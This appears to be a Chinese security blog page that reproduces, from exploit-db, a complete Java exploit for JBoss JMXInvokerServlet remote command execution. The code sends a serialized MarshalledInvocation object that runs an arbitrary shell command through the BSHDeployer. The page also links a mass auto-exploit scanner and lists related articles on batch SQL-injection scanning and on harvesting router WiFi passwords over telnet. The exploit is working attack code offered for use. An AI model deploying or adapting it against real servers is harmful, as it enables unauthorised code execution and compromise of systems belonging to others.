exploit-db提供出了EXP,如下:

 /*

  * JBoss JMXInvokerServlet Remote Command Execution

  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki

  *

  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).

  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"

  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

  * and the "JMX Console" are protected or disabled.

  *

  * [FAQ]

  *

  * Q: Is my target vulnerable?

  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable

  *

  * Q: How to fix it?

  * A: Enable authentication in "jmx-invoker-service.xml"

  *

  * Q: Is this exploit version-dependent?

  * A: Unfortunately, yes. An hash value is used to properly invoke a method.

  *    At least comparing version 4.x and 5.x, these hashes are different.

  *

  * Q: How to compile and launch it?

  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java

  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker

  *    Yes, it's a Java exploit. I can already see some of you complaining....

  */

 import java.io.BufferedReader;

 import java.io.IOException;

 import java.io.InputStream;

 import java.io.InputStreamReader;

 import java.io.ObjectOutputStream;

 import java.lang.reflect.Array;

 import java.lang.reflect.Field;

 import java.lang.reflect.Method;

 import java.net.ConnectException;

 import java.net.HttpURLConnection;

 import java.net.URL;

 import javax.management.MalformedObjectNameException;

 import javax.management.ObjectName;

 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

 public class JMXInvokerServlet {

     //---------> CHANGE ME <---------

     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1

     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";

     static final String cmd = "touch /tmp/exectest";

     //-------------------------------

     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

         //Create a malicious Java serialized object

         MarshalledInvocation payload = new MarshalledInvocation();

         payload.setObjectName(new Integer(hash));

         //Executes the MBean invoke operation

         Class<?> c = Class.forName("javax.management.MBeanServerConnection");

         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);

         payload.setMethod(method);

         //Define MBean's name, operation and pars

         Object myObj[] = new Object[4];

         //MBean object name

         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");

         //Operation name

         myObj[1] = new String("createScriptDeployment");

         //Actual parameters

         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};

         //Operation signature

         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

         payload.setArguments(myObj);

         System.out.println("\n--[*] MarshalledInvocation object created");

         //For debugging - visualize the raw object

         //System.out.println(dump(payload));

         //Serialize the object

         try {

             //Send the payload

             URL server = new URL(url);

             HttpURLConnection conn = (HttpURLConnection) server.openConnection();

             conn.setRequestMethod("POST");

             conn.setDoOutput(true);

             conn.setDoInput(true);

             conn.setUseCaches(false);

             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");

             conn.setRequestProperty("Connection", "keep-alive");

             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");

             conn.setRequestProperty("Content-Type", "application/octet-stream");

             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");

             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());

             wr.writeObject(payload);

             System.out.println("\n--[*] MarshalledInvocation object serialized");

             System.out.println("\n--[*] Sending payload...");

             wr.flush();

             wr.close();

             //Get the response

             InputStream is = conn.getInputStream();

             BufferedReader rd = new BufferedReader(new InputStreamReader(is));

             String line;

             StringBuffer response = new StringBuffer();

             while ((line = rd.readLine()) != null) {

                 response.append(line);

             }

             rd.close();

             if (response.indexOf("Script Name") != -1) {

                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");

             } else {

                 System.out.println("\n--[!] An invocation error occured...");

             }

         } catch (ConnectException cex) {

             System.out.println("\n--[!] A connection error occured...");

         } catch (IOException ex) {

             ex.printStackTrace();

         }

     }

     /*

      * Raw dump of generic Java Objects

      */

     static String dump(Object o) {

         StringBuffer buffer = new StringBuffer();

         Class oClass = o.getClass();

         if (oClass.isArray()) {

             buffer.append("[");

             for (int i = 0; i < Array.getLength(o); i++) {

                 if (i > 0) {

                     buffer.append(",\n");

                 }

                 Object value = Array.get(o, i);

                 buffer.append(value.getClass().isArray() ? dump(value) : value);

             }

             buffer.append("]");

         } else {

             buffer.append("{");

             while (oClass != null) {

                 Field[] fields = oClass.getDeclaredFields();

                 for (int i = 0; i

                         < fields.length; i++) {

                     if (buffer.length() > 1) {

                         buffer.append(",\n");

                     }

                     fields[i].setAccessible(true);

                     buffer.append(fields[i].getName());

                     buffer.append("=");

                     try {

                         Object value = fields[i].get(o);

                         if (value != null) {

                             buffer.append(value.getClass().isArray() ? dump(value) : value);

                         }

                     } catch (IllegalAccessException e) {

                     }

                 }

                 oClass = oClass.getSuperclass();

             }

             buffer.append("}");

         }

         return buffer.toString();

     }

 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

JBOSS批量扫描的更多相关文章

  1. Burpsuite+sqlmap批量扫描sql漏洞

    1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自 ...

  2. BurpSuite导出log配合SQLMAP批量扫描注入点

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  3. 批量扫描互联网无线路由设备telnet,并获取WIFI密码

    批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513

  4. sqlmap批量扫描burpsuite请求日志记录

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  5. BBScan — 一个信息泄漏批量扫描脚本

    github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...

  6. wwwscan网站目录文件批量扫描工具

    准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...

  7. sqlmap批量扫描burpsuite拦截的日志记录

    1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...

  8. 批量扫描IP端口程序 (适用于window&linux)

    批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...

  9. 从Excel获取整列内容进行批量扫描

    实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...

随机推荐

  1. Hadoop实战2:MapReduce编程-WordCount实例-streaming-python环境

    这是搭建hadoop环境后的第一个MapReduce程序: 基于hadoop streaming的python的脚本: 1 map.py文件,把文本的内容划分成单词: #!/usr/bin/pytho ...

  2. 160930、Javascript的垃圾回收机制与内存管理

    一.垃圾回收机制-GC Javascript具有自动垃圾回收机制(GC:Garbage Collecation),也就是说,执行环境会负责管理代码执行过程中使用的内存. 原理:垃圾收集器会定期(周期性 ...

  3. Overview of Flashback Technology

    Oracle Flashback Query : SELECT AS OFOracle Flashback Version Query :DBMS_FLASHBACK PackageOracle Fl ...

  4. grep DEMO

    测试数据: [xiluhua@vm-xiluhua][~]$ cat msn.txt aaa bbb bbb ccc ccc ddd bbb eee aaa ccc bbb sss [xiluhua@ ...

  5. HttpClient I/O exception (java.net.SocketException) caught when processing request: Connect

    转自:http://luan.iteye.com/blog/1820054 I/O exception (java.net.SocketException) caught when processin ...

  6. struts2的两个核心配置文件

    struts2的两个核心配置文件,即:struts.default.xml和struts.properties A,位置:都在struts2-core-version.jar文件中 B,作用,stru ...

  7. [ERROR][org.springframework.web.context.ContextLoader][main] Context initialization failed org.sprin

    做一个SSH为基础框架的webapp小DEMO,复制了一把以前可以跑的代码,竟发现无法初始化数据源,报错如下: [ERROR][org.springframework.web.context.Cont ...

  8. Greenplum的全量备份之gpcrondump

    gpcrondump是对gp_dump的一个包装,可以直接调用或者从crontab中调用.这个命令还允许备份除了数据库和数据之外的对象,比如数据库角色和服务器配置等. gpcrondump 常用到的参 ...

  9. 20145227《Java程序设计》第10周学习总结

    20145227<Java程序设计>第10周学习总结 教材学习内容总结 网络编程 就是在两个或两个以上的设备(例如计算机)之间传输数据.程序员所作的事情就是把数据发送到指定的位置,或者接收 ...

  10. ACM第四站————最小生成树(克鲁斯卡尔算法)

    都是生成最小生成树,库鲁斯卡尔算法与普里姆算法的不同之处在于——库鲁斯卡尔算法的思想是以边为主,找权值最小的边生成最小生成树. 主要在于构建边集数组,然后不断寻找最小的边. 同样的题目:最小生成树 题 ...